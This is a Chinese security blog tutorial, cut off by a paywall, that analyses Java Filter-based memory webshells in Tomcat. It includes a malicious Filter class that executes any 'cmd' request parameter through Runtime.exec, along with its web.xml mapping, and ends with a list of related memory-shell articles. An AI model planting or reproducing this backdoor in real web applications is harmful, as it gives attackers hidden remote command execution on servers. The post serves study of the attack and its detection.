java Filter内存马分析

最新推荐文章于 2025-04-02 15:45:12 发布
原创 最新推荐文章于 2025-04-02 15:45:12 发布 · 964 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #开发语言

本文探讨了Java Web中的Filter内存马,介绍了其概念、环境搭建、Filter内存马的探索,包括Tomcat Filter的执行流程和攻击思路分析。通过分析,展示了如何动态注册Filter马并编写exp,强调了其在攻防中的隐蔽性和危害性。

目录

0x01 什么是Filter马

0x02 环境搭建

0x03 Filter内存马探索

1.tomcat Filter 的流程分析

2.攻击思路分析

0x04 Filter内存马exp编写

本文由掌控安全学院 - xilitter 投稿

知识基础:

刚开始内存马的这块学习与反序列化并无太大关系,反而与javaweb,tomcat联系更加紧密。所以在学习内存马之前需要先了解JSP,java web的三大件,Servlet,Filter,Listener的基本知识和工作流程和Tomcat 架构的相关内容。

0x01 什么是Filter马

内存马就是无文件木马,无文件落地,它通常会存在进程,内存或者java虚拟机中,特点更加隐蔽,难以排查,并且也难以删除。而今天学习的Filter内存马是传统web应用型内存马,主要将恶意代码注入到过滤器中,当过滤器拦截servlet请求的参数时,过滤器中的恶意代码就会执行。

0x02 环境搭建

首先配置一个 servlet 的web项目,
 

图片


然后一直点下一步就好了,它会自动帮我们生成一个简单的servlet
pom.xml中导入tomcat相关依赖

<dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-catalina</artifactId>
            <version>9.0.38</version>
            <scope>provided</scope>
        </dependency>
        <dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-websocket</artifactId>
            <version>9.0.38</version>
        </dependency>

方便之后调试代码,在这之后我们创建一个自定义的Filter过滤器

package com.example.memoryhorse;
import javax.servlet.*;
import java.io.IOException;

public class MyFilter implements Filter{
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("执行过滤功能");
        servletRequest.setCharacterEncoding("utf-8");
        servletResponse.setCharacterEncoding("utf-8");
        servletResponse.setContentType("text/html;charset=UTF-8");
        filterChain.doFilter(servletRequest,servletResponse);
        System.out.println(servletRequest.getParameter("cmd"));
        Runtime.getRuntime().exec(servletRequest.getParameter("cmd"));
    }
}

重写了doFilter方法,里面添加恶意代码,接收cmd参数,执行任意命令。web.xml中配置相关参数

<filter>
    <filter-name>MyFilter</filter-name>
    <filter-class>com.example.memoryhorse.MyFilter</filter-class>
</filter>
<filter-mapping>
    <filter-name>MyFilter</filter-name>
    <url-pattern>/MyFilter</url-pattern>
</filter-mapping>

这里我定义的是/MyFilter路由,在访问这个路由时,就会被我们自定义的过滤器拦截

0x03 Filter内存马探索

这个时候是不是就有点像内存马的样子,我们注册了一个恶意的 /MyFilter 路由,访问这个路由可以执行任意代码。测试一下
 

最低0.47元/天 解锁文章
zkzq
关注
内存基础知识 Java
CodeShiftZ的博客
09-07 535
Java中有三种类加载器:引导类加载器(Bootstrap Class Loader)、扩展类加载器(Extension Class Loader)和应用程序类加载器(Application Class Loader)。内存(Memory Shellcode)是一种恶意代码注入技术,它利用软件漏洞或者其他方式将恶意代码加载到受感染的进程内存中,并在执行过程中劫持程序的控制流。在Java中,我们可以自定义类加载器,通过继承ClassLoader类并实现自己的加载逻辑来加载类。内存基础知识 Java
Java Tomcat内存——filter内存
m0_61506558的博客
11-17 838
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
一文深度学习java内存
jxiang213的博客
10-25 1416
java内存注入一般分为两种动态注册添加新的listener/filter/servlet/controller等等agent注入修改已有class,插入恶意代码在理解内存注入前,有几个概念需要掌握的。类加载双亲委派问题以及context类反射。
JAVA安全—手搓内存
2301_76227305的博客
03-01 1838
首先什么是内存呢,顾名思义就是把木打进内存中。传统的webshell一旦把文件删除就断开连接了,而Java内存则不同,它将恶意代码直接加载到内存中运行。因为代码是直接在内存中执行的,它不需要保存到硬盘上,这使得它很难被传统的杀毒软件发现和检测。至此结束。
学习Java agent 内存(看不懂别关闭,直接喷!!!)
一剑开天门!的博客
12-23 3768
java agent 是 Java 程序,可以通过在 Java 虚拟机(JVM)启动时提供参数来加载和运行。它可以通过 java.lang.instrument 包提供的 Java 标准接口进行代码插桩,从而在 Java 应用程序的类加载和运行期间改变 Java 字节码。而java agent内存就是利用这个特性产生。
浅析JavaWeb内存基础原理与查杀思路
道阻且长,行则将至
04-04 7627
传统的 Webshell 后门很容易被当前 WAF、HIDS、EDR 等安全设备检测出来,于是无文件落地的内存技术得以诞生并快速发展。本文简要分析Java内存的原理、分类,并实践了主流Webshell客户端管理工具内存的使用与当前应对内存的一些查杀思路、手段。
Java服务安全内存实践资料合集(33份).zip
01-14
Java服务安全内存实践资料合集,共33份,供大家学习参阅。 Python 内存分析.pdf ...java Filter内存分析.pdf Java内存:一种Tomcat全版本获取StandardContext的新方法.pdf java内存.pdf ……等等33份。
java内存分析集合
hongduilanjun的博客
04-04 6467
基于tomcat Servlet内存 web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
java内存原理和检测方法
m0_67170526的博客
04-02 1784
内存为现在的主流webshell技术之一, 一般存在于JAVA环境, ASPX环境也有内存,但是PHP没有(有不死,类似条件竞争)内存主要用途是做权限维持,特点是无文件,代码保存在内存中,导致值守人员不太好进行排查。
Java内存简单实现
派大星的博客
12-04 2838
Java内存
Java内存基础
m0_46317063的博客
02-05 493
filter内存基础
Java内存 原理、实战与查杀】
weixin_46318447的博客
06-11 3534
内存原理 、实战与查杀
java内存
google20的博客
12-25 1591
filter,servlet,listener,valve,spring内存
Java内存攻防实战——攻击基础篇
JavaMonsterr的博客
05-23 3706
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个篇章,分别是攻击基础篇和防护应用篇。本篇攻击基础篇介绍了Java Servlet
[Java安全]—Controller内存
Sentiment的博客
11-02 705
Controller内存
【Web】小白友好的Java内存基础学习笔记
uuzeray的博客
02-10 2067
内存(Memory Shellcode)是一种恶意攻击技术,旨在通过利用程序或操作系统的漏洞,将恶意代码注入到系统内存中并执行。与传统的攻击方式不同,内存不需要将恶意代码写入磁盘上的文件,而是直接在内存中进行操作,从而避开传统的安全防护措施。内存的危害性在于它可以绕过许多传统的安全防护机制,例如防病毒软件和防火墙,因为恶意代码不会留下明显的痕迹或文件。此外,由于直接在内存中执行,内存攻击也更难以被检测和追踪。
小谈java内存
shihui的博客
03-08 1111
省流版Servlet 内存:通过动态注册恶意 Servlet 并绑定 URL 路由,当访问特定路径时触发恶意逻辑。Filter 内存:通过动态注册恶意 Filter 并配置路由,拦截请求时触发恶意逻辑。Listener 内存:通过动态注册恶意 Listener,当特定事件发生时(如应用启动、会话创建)触发恶意逻辑。
红队视角下Java内存的应用
include_voidmain的博客
11-07 929
红队视角下Java内存的应用
Filter内存
最新发布
08-30
Filter内存是一种基于Java Web应用的恶意代码注入技术,它利用Java Servlet Filter机制实现。在Java Web应用中,Filter用于在请求到达Servlet之前或响应返回客户端之前对请求和响应进行预处理和后处理。攻击者通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值